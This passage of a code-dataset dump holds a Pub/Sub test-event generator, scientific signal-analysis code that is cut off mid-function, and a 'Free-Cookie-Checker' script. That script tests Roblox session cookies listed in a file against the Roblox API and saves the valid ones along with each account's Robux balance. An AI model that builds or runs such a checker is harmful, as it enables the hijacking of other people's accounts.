"text": "# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Pushes defined number of random messages to the Pub/Sub.\"\"\"\n\nimport argparse\nimport datetime\nimport json\nimport random\nimport signal\nimport sys\nimport time\n\nfrom google.cloud import pubsub_v1\n\n# Configure Command line parser for arguments\ncmd_flags_parser = argparse.ArgumentParser(\n description='Publish messages to Pub/Sub',\n prefix_chars='-')\ncmd_flags_parser.add_argument('--event_count', type=int,\n help='Number of log events to generate',\n default=-1)\ncmd_flags_parser.add_argument('--topic', type=str,\n help='Name of the Pub/Sub topic')\ncmd_flags_parser.add_argument('--project-id', type=str,\n help='GCP Project Id running the Pub/Sub')\ncmd_flags_parser.add_argument('--enable-log', type=bool,\n default=False,\n help='print logs')\n\n# Extract command-line arguments\ncmd_arguments = cmd_flags_parser.parse_args()\n\n# Define configuration\n_LOGGING_ENABLED = cmd_arguments.enable_log\n_EXPERIMENT_VARIANTS = ['default', '1', '2', '3']\n_SEND_EVENTS_COUNT = cmd_arguments.event_count # Default send infinite messages\n_PUB_SUB_TOPIC = cmd_arguments.topic\n_GCP_PROJECT_ID = cmd_arguments.project_id\n_PUBLISHER = pubsub_v1.PublisherClient()\n_START_TIME = time.time()\n_TOPIC_PATH = _PUBLISHER.topic_path(_GCP_PROJECT_ID, _PUB_SUB_TOPIC)\n\nmessage_count = 0\n\n\ndef build_user_id():\n \"\"\"\n Generates random user ids with some overlap to simulate a real world\n user behaviour on an app or website.\n :return: A slowly changing random number.\n \"\"\"\n elapsed_tens_minutes = int((time.time() - _START_TIME) / 600) + 1\n present_millis = int(1000 * (time.time() - int(time.time())))\n\n if present_millis == 0:\n present_millis = random.randint(1,1000)\n\n if _LOGGING_ENABLED:\n print(\n 'generating user_id: elapsed_tens_minute = {}, present_millis = {}'.format(\n elapsed_tens_minutes, present_millis))\n\n return random.randint(elapsed_tens_minutes + present_millis,\n (10 + elapsed_tens_minutes) * present_millis)\n\n\ndef build_message():\n \"\"\" Generates an event message imitation\n :return: A random event message\n \"\"\"\n return dict(\n uid=build_user_id(),\n # change experiment ids based on date/time\n experiment_id=random.randint(1, 100),\n variant=_EXPERIMENT_VARIANTS[random.randint(0, 3)],\n timestamp=datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'))\n\n\ndef send_to_pub_sub(message):\n \"\"\" Sends the provided payload as JSON to Pub/Sub.\n :param message: the Event information payload\n :return: the published message future.\n \"\"\"\n return _PUBLISHER.publish(_TOPIC_PATH,\n data=json.dumps(message).encode('utf-8'))\n\n\ndef print_message_count_before_exit(sig, frame):\n \"\"\" Interrupt handler to print the count of messages sent to pub/sub before\n exiting python.\n :param sig: the interrupt signal.\n :param frame: the stackframe.\n \"\"\"\n print('\\nSent {} messages.\\nExiting'.format(message_count))\n sys.exit(0)\n\n\n# Register message count 
printer\nsignal.signal(signal.SIGINT, print_message_count_before_exit)\n\nprint('ProjectId: {}\\nPub/Sub Topic: {}'.format(_GCP_PROJECT_ID, _TOPIC_PATH))\nprint('Sending events in background.')\nprint('Press Ctrl+C to exit/stop.')\n\n# Infinite loop to keep sending messages to pub/sub\nwhile _SEND_EVENTS_COUNT == -1 or message_count < _SEND_EVENTS_COUNT:\n event_message = build_message()\n if (_LOGGING_ENABLED):\n print('Sending Message {}\\n{}'.format(message_count + 1,\n json.dumps(event_message)))\n\n message_count += 1\n pub_sub_message_unique_id = send_to_pub_sub(event_message)\n\n if (_LOGGING_ENABLED):\n print(\n 'pub_sub_message_id: {}'.format(pub_sub_message_unique_id.result()))\n\n _sleep_time = random.randint(10, 10000) # Random sleep time in milli-seconds.\n if (_LOGGING_ENABLED):\n print('Sleeping for {} ms'.format(_sleep_time))\n time.sleep(_sleep_time / 1000)\n"
},
{
"alpha_fraction": 0.8518518805503845,
"alphanum_fraction": 0.8518518805503845,
"avg_line_length": 12.5,
"blob_id": "bc28ae50b698f5cbf5c28aac6132abf0a5b5fec2",
"content_id": "6b36ce54f7c2fb9b2038d7fb4d99124ea03a93d1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 27,
"license_type": "permissive",
"max_line_length": 19,
"num_lines": 2,
"path": "/loggen/requirements.txt",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "google\ngoogle-cloud-pubsub\n"
}
] | 9 |
seanshocker/Free-Cookie-Checker | https://github.com/seanshocker/Free-Cookie-Checker | 5ce6c7771d701358037da64e994f18b1cd14ab49 | fdf314637894f0b9896ba1de00c7d897d1b6a69a | cb94467bcc43c0d57208c4cd1af06f78979335dd | refs/heads/main | 2023-01-21T10:20:13.570009 | 2020-11-28T09:14:35 | 2020-11-28T09:14:35 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.3521551787853241,
"alphanum_fraction": 0.35517242550849915,
"avg_line_length": 56.04999923706055,
"blob_id": "333d4e7893b6fc9e4d9d55554c10b858c817f890",
"content_id": "7fd3c6cbabd10c66c1ff907c8eff0bca54fb682a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2320,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 40,
"path": "/main.py",
"repo_name": "seanshocker/Free-Cookie-Checker",
"src_encoding": "UTF-8",
"text": "import requests\r\nimport time\r\nimport json\r\nimport termcolor\r\ndef watermark(text):\r\n print(termcolor.colored(text, \"blue\"))\r\nwatermark(\"___________ .__ _________ __ .__ _________ .__ __ \")\r\nwatermark(\"\\_ _____/______|__| ____ ____ ___ ___ ______ \\_ ___ \\ ____ ____ | | _|__| ____ \\_ ___ \\| |__ ____ ____ | | __ ___________ \")\r\nwatermark(\" | __) \\_ __ \\ |/ _ \\ / \\\\ \\/ / / ___/ / \\ \\/ / _ \\ / _ \\| |/ / |/ __ \\ / \\ \\/| | \\_/ __ \\_/ ___\\| |/ // __ \\_ __ \\\\\")\r\nwatermark(\" | \\ | | \\/ ( <_> ) | \\> < \\___ \\ \\ \\___( <_> | <_> ) <| \\ ___/ \\ \\___| Y \\ ___/\\ \\___| <\\ ___/| | \\/\")\r\nwatermark(\" \\___ / |__| |__|\\____/|___| /__/\\_ \\/____ > \\______ /\\____/ \\____/|__|_ \\__|\\___ > \\______ /___| /\\___ >\\___ >__|_ \\\\___ >__| \")\r\nwatermark(\" \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/ \")\r\nprint(termcolor.colored(\"Frionx's Cookie Checker\", \"blue\"))\r\ntext_file = open(\"cookies.txt\", \"r\")\r\nlines = text_file.readlines()\r\napiUrl = \"http://www.roblox.com/mobileapi/userinfo\"\r\ni = 0\r\nfor i in range(0, len(lines)):\r\n cookie = {'.ROBLOSECURITY': lines[i].replace(\"\\n\", \"\")}\r\n x = requests.get(apiUrl, cookies=cookie)\r\n if (x.status_code == 200):\r\n if \"<meta name\" in x.text:\r\n print(termcolor.colored(\"Cookie did not properly work\", \"red\"))\r\n else:\r\n respJson = json.loads(x.text)\r\n username = respJson[\"UserName\"]\r\n robux = respJson[\"RobuxBalance\"]\r\n premium = False\r\n if respJson['IsPremium'] == \"true\":\r\n premium = True\r\n else:\r\n premium = False\r\n print(termcolor.colored(\"Username: \" + str(username) + \" | Robux: \" + str(robux) + \" | Premium: \" + str(premium) + \" | Cookie: \" + str(lines[i]), \"green\"))\r\n with open(\"success.txt\", \"a\") as myfile:\r\n myfile.write(str(lines[i]))\r\n time.sleep(0.3)\r\n else:\r\n print(termcolor.colored(\"Request did not properly work\", \"red\"))\r\n\r\ninput(termcolor.colored(\"Press enter to close\", \"red\"))"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 21,
"blob_id": "7006559f85001ce8d4de7f875330c136f0a01ed5",
"content_id": "fdadda2ae2981e3f6362d0927e83651f003c295e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 1,
"path": "/README.md",
"repo_name": "seanshocker/Free-Cookie-Checker",
"src_encoding": "UTF-8",
"text": "# Free-Cookie-Checker"
}
] | 2 |
Omaam/csa | https://github.com/Omaam/csa | 6927b1c341e734a76f73d182fe884e503bb061fb | 35abd558a10b2d8e4dd0d90dcfed6c257432a467 | 2243f926a1eaacde3b446bd5d56b62b2b30b799c | refs/heads/main | 2023-05-07T11:59:29.863020 | 2021-06-03T10:59:49 | 2021-06-03T10:59:49 | 323,592,346 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5551576018333435,
"alphanum_fraction": 0.5805873870849609,
"avg_line_length": 26.920000076293945,
"blob_id": "0faa746019979d8657f221656de4cee819787c28",
"content_id": "076f0939a242be0cf7663a9372b94418a934b155",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2792,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 100,
"path": "/example/simdata/plsimulation.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\n\ndef mkmat(t, f):\n t = np.array([t])\n f = np.array([f])\n phase = 2 * np.pi * np.dot(t.T, f)\n mat = np.hstack([np.cos(phase), np.sin(phase)])\n return mat\n\ndef get_frecvec(low, hig, num):\n freq_edge = np.linspace(low, hig, int(num + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\ndef powerlaw(freq_vec, beta=2):\n pow_vec = freq_vec ** -beta\n return pow_vec\n\ndef get_plsimulation(n_time, lag, f_vec, seed=69):\n '''return y1_data, y2_data: ndarray\n '''\n assert isinstance(lag, int), 'lag must be int'\n\n # rondom phase\n np.random.seed(seed)\n power_vec = powerlaw(f_vec)\n realpart_vec = np.random.normal(0, 0.5 * np.sqrt(power_vec))\n imagpart_vec = np.random.normal(0, 0.5 * np.sqrt(power_vec))\n\n # calculation\n x_vec = np.hstack([realpart_vec, imagpart_vec])\n delta_f = np.diff(f_vec).mean()\n t_vec = np.linspace(0, 2 * n_time - 1, 2* n_time)\n A_mat = 2 * delta_f * mkmat(t_vec, f_vec)\n y_vec = np.dot(A_mat, x_vec)\n data1 = np.array([t_vec[:n_time], y_vec[lag:lag+n_time]]).T\n data2 = np.array([t_vec[:n_time], y_vec[:n_time]]).T\n return data1, data2\n\ndef psd(f_vec, ax=None, seed=69):\n # random phase\n np.random.seed(seed)\n power_vec = powerlaw(f_vec)\n realpart_vec = np.random.normal(0, 0.5 * np.sqrt(power_vec))\n imagpart_vec = np.random.normal(0, 0.5 * np.sqrt(power_vec))\n ranpower = realpart_vec ** 2 + imagpart_vec ** 2\n\n # plot\n if ax is None:\n fig, ax = plt.subplots()\n ax.plot(f_vec, ranpower, label='randomized power')\n ax.plot(f_vec, power_vec, label=r'$S(f)\\sim f^{-2}$')\n ax.set_yscale('log')\n ax.set_xscale('log')\n ax.set_xlabel('freq')\n ax.set_ylabel('power')\n ax.legend(loc='best')\n return ax\n\ndef main():\n\n # frequency\n freq_lo = 0\n freq_hi = 0.5\n nfreq = 2500\n f_vec = get_frecvec(freq_lo, freq_hi, nfreq)\n\n # calculation\n n_time = 5000\n lag = 5\n xdata, odata = get_plsimulation(n_time, lag, f_vec, seed=69)\n np.savetxt('xdata.dat', xdata)\n np.savetxt('odata.dat', odata)\n\n # plot lc\n fig, ax = plt.subplots(2, sharex=True)\n ax[0].plot(odata[:, 0], odata[:, 1])\n ax[0].set_ylabel('flux')\n ax[1].plot(xdata[:, 0], xdata[:, 1])\n ax[1].set_xlabel('time')\n ax[1].set_ylabel('flux')\n plt.tight_layout()\n plt.show()\n\n # plot lc and psd\n # fig, ax = plt.subplots(2, figsize=(5,7))\n # ax[0].plot(odata[:, 0], odata[:, 1])\n # ax[0].set_xlabel('time')\n # ax[0].set_ylabel('flux')\n # psd(f_vec, ax=ax[1], seed=69)\n # plt.tight_layout()\n # fig.savefig('test_half.pdf')\n # plt.show()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5282926559448242,
"alphanum_fraction": 0.5575609803199768,
"avg_line_length": 25.973684310913086,
"blob_id": "8aaa03044eaaf4eecffe60ad1a6bd5d9448d4f13",
"content_id": "3b28e562789c15313269454eb1ae042295a1be50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2050,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 76,
"path": "/example/_stft_test.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import sys\nsys.path.append('..')\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\nfrom window_function import WindowGenerator\n\ndef main():\n # setting\n infile1 = 'xdata.dat'\n infile2 = 'odata.dat'\n freqinfo = [0, 0.5, 2000]\n lambdainfo = [1e-1, 1e2, 20]\n nsegment = 1000\n noverlap = 500\n\n # read data\n xdata = np.loadtxt(infile1)\n odata = np.loadtxt(infile2)\n time = xdata[:,0]\n x = xdata[:,1]\n o = odata[:,1]\n\n # figure\n t = xdata[:1000, 0]\n y = xdata[:1000, 1]\n y_d = y - y.mean()\n window = WindowGenerator((t[0], t[-1]))\n window.hann()\n y_w = window.gene(t) * y\n y_dw = window.gene(t) * y_d\n y_adw = window.gene(t) * y_d + y.mean()\n plt.plot(t, y, t, y_w, t, y_dw, t, y_adw)\n plt.legend(['Original', 'Filter(original)',\n 'Filter(deviation)', 'Ave. + Filter(deviation)'])\n plt.xlabel('time')\n plt.ylabel('flux')\n plt.tight_layout()\n plt.savefig('example_ori_vs_win.png')\n plt.show()\n\n f, t, Zxx_x = signal.stft(xdata[:,1], 1,\n nperseg=nsegment, noverlap=noverlap)\n f, t, Zxx_o = signal.stft(odata[:,1], 1,\n nperseg=nsegment, noverlap=noverlap)\n print(f't: {t.shape}')\n print(f't: {t}')\n print(f'f: {f.shape}')\n print(f'Zxx_x: {Zxx_x.shape}')\n print(f'Zxx_o: {Zxx_o.shape}')\n\n # plot\n fig, ax = plt.subplots(2, sharex=True)\n ax[0].pcolormesh(t, f, np.log10(np.abs(Zxx_o)), shading='gouraud')\n ax[0].set_ylabel('Frequency [Hz]')\n ax[0].set_title('STFT Magnitude')\n\n ax[1].pcolormesh(t, f, np.log10(np.abs(Zxx_x)), shading='gouraud')\n ax[1].set_ylabel('Frequency [Hz]')\n ax[1].set_xlabel('Time [sec]')\n plt.show()\n\n _, xrec = signal.istft(Zxx_x, 1)\n plt.figure()\n plt.plot(_, xrec, time, x, time, o)\n # plt.xlim(0, 1000)\n plt.xlabel('Time [sec]')\n plt.ylabel('Signal')\n plt.legend(['Filtered via STFT', 'True Carrier'])\n plt.show()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5306543707847595,
"alphanum_fraction": 0.5585291981697083,
"avg_line_length": 31.4536075592041,
"blob_id": "42e30e2ccc204d57fc64b6cd5dfa817221ff0d44",
"content_id": "0df22e935b6109eb2b8e9ee2bfb261ed5f528e55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12592,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 388,
"path": "/example/windowtest/test.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from concurrent.futures import ProcessPoolExecutor, as_completed\nimport time\nimport os\nncpu = os.cpu_count()\nMAX_WORKERS = ncpu\nprint(f'number of cpu: {ncpu}')\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom scipy import interpolate\nfrom sklearn.model_selection import KFold\nfrom tqdm import tqdm, trange\n\nfrom csa.make_matrix import mkmat_cs, mkmat_cs_w\nfrom csa.fista import fista\nfrom csa.window_function import WindowGenerator\nfrom csa.summary_handler import SummaryNew\nfrom csa.deco import stopwatch, change_directory\nimport csa.xhandler as xhan\nfrom csa.cvresult import show_cvdata, lambda_fromcvdata\n\n__all__ = ['cs', 'cv', 'stcs', 'istcs']\n\n\n# analysis option\nCV = 0\nSTCS = 1\nISTCS = 1\n\nFIGSHOW = 1\n\n\n# functions for csa\ndef _sub_ave(flux):\n f = np.array(flux)\n f_out = f - f.mean()\n return f_out\n\n\ndef _get_minmax(*args):\n a = np.hstack(args)\n return a.min(), a.max()\n\ndef _get_frecvec(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\n\ndef _complement_index(ind):\n comp = np.ones(len(ind), dtype=bool)\n comp[ind] = False\n return comp\n\n\ndef _query_lightcurve(data, timerage):\n data_out = data[np.where((timerage[0] <= data[:,0]) & (data[:,0] < timerage[1]))]\n return data_out\n\n\ndef _drop_sample(data, rate):\n n_data = data.shape[0]\n n_drop = int(n_data * rate)\n index_drop = np.random.RandomState().choice(\n n_data - 1, n_drop, replace=False)\n data_del = np.delete(data, index_drop, 0)\n return data_del\n\n\ndef _segment_time(t_sta, t_end, tperseg, toverlap):\n # set constant\n tstep = tperseg - toverlap\n nstep = (t_end - t_sta - tperseg) // tstep + 2\n\n # calcurate edge of lefts and rights\n edge_left = t_sta + np.arange(nstep)*tstep\n edge_right = t_sta + tperseg + np.arange(nstep)*tstep\n\n # concat edges\n segranges = np.array(list(zip(edge_left, edge_right)))\n return segranges\n\n\ndef _search_index(original, condition):\n l = list(original)\n indices = np.array(list(map(lambda a: l.index(a),\n condition)))\n return indices\n\n\n# main functions; cs, cv stcs istcs\ndef cs(data1, data2, freqinfo, lam):\n freqs, x = fista(data1, data2, freqinfo, lam)\n return freqs, x\n\n\ndef _cv(data1, data2, freqinfo, lam, nfold=5, droprate=None):\n\n # drop sample\n if droprate:\n data1 = _drop_sample(data1, droprate)\n data2 = _drop_sample(data2, droprate)\n\n # freq vector\n freqs = _get_frecvec(freqinfo)\n\n # get nfold index\n kf1 = KFold(nfold, shuffle=True)#, random_state=1)\n kf2 = KFold(nfold, shuffle=True)#, random_state=2)\n sp1 = kf1.split(data1)\n sp2 = kf2.split(data2)\n\n # cross-validation\n rms = np.zeros(nfold)\n for i, ((i_tr1, i_te1), (i_tr2, i_te2)) in enumerate(zip(sp1, sp2)):\n # split data into one for train and test\n data1_tr, data1_te = data1[i_tr1], data1[i_te1]\n data2_tr, data2_te = data2[i_tr2], data2[i_te2]\n\n # calcurate rms\n freq, x_tr = fista(data1_tr, data2_tr, freqinfo, lam)\n A_mat_te = mkmat_cs(data1_te[:,0], data2_te[:,0], freqs)\n y_te = np.dot(A_mat_te, x_tr)\n data_te = np.hstack([data1_te[:,1], data2_te[:,1]])\n rms[i] = np.sqrt(np.dot((data_te - y_te).T, data_te - y_te))\n return rms.mean(), rms.std()\n\n\n@stopwatch\ndef cv(data1, data2, freqinfo, lambdainfo, nfold=5, droprate=None):\n\n # use window and subtract average\n data1_win = data1.copy()\n data2_win = data2.copy()\n t_minmax = _get_minmax(data1[:,0], data2[:,0])\n window = 
WindowGenerator(t_minmax)\n window.hann()\n data1_win[:,1] = _sub_ave(data1[:,1]) * window.gene(data1[:,0])\n data2_win[:,1] = _sub_ave(data2[:,1]) * window.gene(data2[:,0])\n\n\n # set lambda info\n lambdas = np.logspace(np.log10(lambdainfo[0]),\n np.log10(lambdainfo[1]),\n lambdainfo[2])\n print('lambdas:\\n{}'.format(lambdas))\n\n # cross-validation with multi process\n cvdata = np.zeros((3, lambdas.shape[0])).T\n cvdata[:,0] = lambdas\n with ProcessPoolExecutor(MAX_WORKERS) as executor:\n futures = tqdm([executor.submit(_cv, lam=lam,\n data1=data1_win,\n data2=data2_win,\n freqinfo=freqinfo,\n droprate=droprate)\n for lam in lambdas])\n for k, future in enumerate(futures):\n cvdata[k,1:] = future.result()\n\n return cvdata\n\n\ndef _stcs(data1, data2, segrange, freqinfo, lam, droprate=None):\n # print(f'start {segrange}')\n\n # query time which is in segrange\n data1_seg = _query_lightcurve(data1, segrange)\n data2_seg = _query_lightcurve(data2, segrange)\n data1_seg_win = data1_seg.copy()\n data2_seg_win = data2_seg.copy()\n\n # use window fuction\n window = WindowGenerator(segrange)\n window.hann()\n data1_seg_win[:,1] = _sub_ave(data1_seg[:,1]) * window.gene(data1_seg[:,0])\n data2_seg_win[:,1] = _sub_ave(data2_seg[:,1]) * window.gene(data2_seg[:,0])\n # data1_seg_win[:,1] = data1_seg[:,1] * window.gene(data1_seg[:,0])\n # data2_seg_win[:,1] = data2_seg[:,1] * window.gene(data2_seg[:,0])\n acf = window.acf\n ecf = window.ecf\n\n # drop rows\n if droprate:\n data1_seg_win = _drop_sample(data1_seg_win, droprate)\n data2_seg_win = _drop_sample(data2_seg_win, droprate)\n\n # estimate\n freq, x_seg = fista(data1_seg_win, data2_seg_win, freqinfo, lam)\n return x_seg\n\n@stopwatch\ndef stcs(data1, data2, freqinfo, lam, tperseg, toverlap,\n window='hann', x_name='X.dat', droprate=None):\n\n # calucurate segranges\n t_min, t_max = _get_minmax(data1[:,0], data2[:,0])\n segranges = _segment_time(t_min, t_max, tperseg, toverlap)\n\n # load infile\n df_data1 = pd.DataFrame(data1)\n df_data2 = pd.DataFrame(data2)\n\n # output condition\n df_stcsinfo = pd.DataFrame({'cols': ['freq_lo', 'freq_up',\n 'nfreq', 'lambda',\n 'tperseg', 'toverlap'],\n 'vals': [freqinfo[0], freqinfo[1],\n freqinfo[2], lam,\n tperseg, toverlap]})\n df_stcsinfo.to_csv('stcsinfo.txt', sep=' ', header=False, index=False)\n print(df_stcsinfo)\n\n # short time CS with multithread\n X = np.zeros((freqinfo[2]*4, segranges.shape[0]))\n with ProcessPoolExecutor(MAX_WORKERS) as executor:\n futures = tqdm([executor.submit(_stcs, segrange=segrange,\n data1=data1, data2=data2,\n freqinfo=freqinfo,\n lam=lam, droprate=droprate)\n for segrange in segranges])\n for i, future in enumerate(futures):\n X[:,i] = future.result()\n\n # output\n t = np.mean(segranges, axis=1)\n freq = _get_frecvec(freqinfo)\n np.savetxt(x_name, X)\n return freq, t, X\n\ndef _istcs(x, segrange, data1, data2, freqinfo, need_sect, **winargs):\n # print(f'start {segrange}')\n\n # query time which is in segrange\n data1_seg = _query_lightcurve(data1, segrange)\n data2_seg = _query_lightcurve(data2, segrange)\n data1_seg_out = data1_seg.copy()\n data2_seg_out = data2_seg.copy()\n\n # make summary instance\n # (later summary instance -> x instance)\n summ = SummaryNew(x, freqinfo)\n y1, y2 = summ.pred(data1_seg[:,0], data2_seg[:,0])\n\n # reconstruct\n window = WindowGenerator(segrange)\n window.triang(winargs['winargs']['basewidth'])\n wy1 = window.gene(data1_seg[:,0]) * (y1 + data1[:,1].mean())\n wy2 = window.gene(data2_seg[:,0]) * (y2 + data2[:,1].mean())\n\n # 
substitution; to conserve energy, it is divided by\n # Energy Correction Factor (ECF)\n win_sect = window.sect\n data1_seg_out[:,1] = wy1 * (need_sect/win_sect)\n data2_seg_out[:,1] = wy2 * (need_sect/win_sect)\n\n # print(f'finish {segrange}')\n return data1_seg_out, data2_seg_out\n\n\n@stopwatch\ndef istcs(X, data1, data2, freqinfo, tperseg, toverlap, **winargs):\n '''\n T: ndarray\n The series of start time of each segment\n '''\n # calucurate segranges\n t_min, t_max = _get_minmax(data1[:,0], data2[:,0])\n segranges = _segment_time(t_min, t_max, tperseg, toverlap)\n\n # prepare ndarray for reconstraction\n y1_rec = data1.copy()\n y2_rec = data2.copy()\n y1_rec[:,1] = np.zeros(data1.shape[0])\n y2_rec[:,1] = np.zeros(data2.shape[0])\n\n with ProcessPoolExecutor(MAX_WORKERS) as executor:\n need_sect = (tperseg - toverlap) * 1\n futures = tqdm([executor.submit(_istcs, x=x, segrange=segrange,\n data1=data1, data2=data2,\n freqinfo=freqinfo, need_sect=need_sect,\n winargs=winargs)\n for segrange, x in zip(segranges, X.T)])\n for i, future in enumerate(futures):\n # get results\n data1_seg_out, data2_seg_out = future.result()\n\n # search index\n indices_t1 = _search_index(data1[:,0], data1_seg_out[:,0])\n indices_t2 = _search_index(data2[:,0], data2_seg_out[:,0])\n\n # add results\n y1_rec[indices_t1, 1] = y1_rec[indices_t1, 1] \\\n + data1_seg_out[:,1]\n y2_rec[indices_t2, 1] = y2_rec[indices_t2, 1] \\\n + data2_seg_out[:,1]\n\n return y1_rec, y2_rec\n\n\n@change_directory('..')\ndef main():\n print(os.getcwd())\n\n # constant\n tperseg = 1000\n toverlap = 500\n basewidth_triang = 2*(tperseg - toverlap)\n\n # load data\n data1 = np.loadtxt('xdata.dat')\n data2 = np.loadtxt('odata.dat')\n n1 = data1.shape[0]\n n2 = data2.shape[0]\n freqinfo = [0, 0.5, 2000]\n\n # cross-validation\n if CV:\n cv_sta = np.random.randint(toverlap, np.min([n1, n2]) - tperseg)\n cv_end = cv_sta + tperseg\n print(f'time range of cv: [{cv_sta}, {cv_end}]')\n cvdata = cv(data1[cv_sta:cv_end], data2[cv_sta:cv_end], freqinfo,\n [1e-2, 1e3, 20])\n np.savetxt('cvdata.dat', cvdata)\n\n # plot cvdata\n show_cvdata(cvdata)\n plt.savefig('cvcurve.png')\n if FIGSHOW:\n plt.show()\n cvdata = np.loadtxt('./cvdata.dat')\n lam_min = lambda_fromcvdata(cvdata, mode='min')\n print(f'lam_min = {lam_min:.3f}')\n\n # short-time common signal analysis\n if STCS:\n freqs, t, X = stcs(data1, data2, freqinfo, lam_min,\n tperseg, toverlap, droprate=0.1)\n np.savetxt('time.dat', t)\n np.savetxt('freq.dat', freqs)\n\n\n # inverse short-time common signal analysis\n if ISTCS:\n X = np.loadtxt('X.dat')\n print(X.shape)\n\n # query lag comp. 
around true lag\n X_lag = xhan.signiftest(X, freqinfo, testrange=[-10, 10])\n X_lag = xhan.query_forX(X, freqinfo, 'lag', [3, 5])\n X_rem = xhan.subtractX(X, X_lag)\n\n # istcs\n y1_rec, y2_rec = istcs(X, data1, data2, freqinfo,\n tperseg, toverlap,\n basewidth=basewidth_triang)\n data1_lag, data2_lag = istcs(X_lag, data1, data2, freqinfo,\n tperseg, toverlap,\n basewidth=basewidth_triang)\n data1_rem, data2_rem = istcs(X_rem, data1, data2, freqinfo,\n tperseg, toverlap,\n basewidth=basewidth_triang)\n\n # figure\n fig, ax = plt.subplots(2, sharex=True)\n ax[0].plot(data2[:,0], data2[:,1],\n y2_rec[:,0], y2_rec[:,1],\n data2_lag[:,0], data2_lag[:,1],\n data2_rem[:,0], data2_rem[:,1],)\n ax[0].set_ylabel('Optical flux')\n ax[0].legend(['original', 'istcs', 'lag', 'rem'])\n ax[1].plot(data1[:,0], data1[:,1],\n y1_rec[:,0], y1_rec[:,1],\n data1_lag[:,0], data1_lag[:,1],\n data1_rem[:,0], data1_rem[:,1],)\n ax[1].set_ylabel('X-ray flux')\n ax[1].set_xlabel('Time')\n fig.savefig('lc_ncf_noavesub.png')\n if FIGSHOW:\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5385218262672424,
"alphanum_fraction": 0.5573256611824036,
"avg_line_length": 29.631999969482422,
"blob_id": "5d0c4a2c42764a30326a148c72d7eb177ffb4d9e",
"content_id": "368e87ccac020ec2b35011e766d7fd8dc0307b1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7658,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 250,
"path": "/csa/xhandler.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\nfrom csa.signiftest import LagSignifTest\nfrom csa.tools import phist\n\n\n__all__ = ['signiftest', 'query_forX']\n\n\ndef _get_freq(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\n\ndef _limit_phase(phase_diff):\n if phase_diff < -np.pi: # phase_lag > pi\n phase_diff_out = 2*np.pi + phase_diff\n elif phase_diff >= np.pi:\n phase_diff_out = -2*np.pi + phase_diff\n else:\n phase_diff_out = phase_diff\n return phase_diff_out\n\n\ndef _make_summary(x, freqinfo, anti=False):\n\n # x\n x_data = x.reshape(4, int(freqinfo[2])).T\n df_x = pd.DataFrame(x_data, columns=['a', 'b', 'c', 'd'])\n\n # freq\n df_x['freq'] = _get_freq(freqinfo)\n df_x['period'] = 1 / df_x.freq.values\n\n # norm\n df_x['norm1'] = np.sqrt(df_x.a.values**2 + df_x.b.values**2)\n df_x['norm2'] = np.sqrt(df_x.c.values**2 + df_x.d.values**2)\n df_x['norm12'] = np.sqrt(df_x.norm1.values**2 + df_x.norm2.values**2)\n\n # lag\n df_x['alpha1'] = np.arctan2(df_x.b[df_x.a != 0], df_x.a[df_x.a != 0])\n df_x['alpha2'] = np.arctan2(df_x.d[df_x.c != 0], df_x.c[df_x.c != 0])\n df_x.fillna(0, inplace=True)\n delta_alpha = list(map(_limit_phase, df_x.alpha2 - df_x.alpha1))\n df_x['lag'] = delta_alpha / (2 * np.pi * df_x.freq.values)\n\n # summary\n df_sum = df_x[['lag', 'norm12', 'norm1', 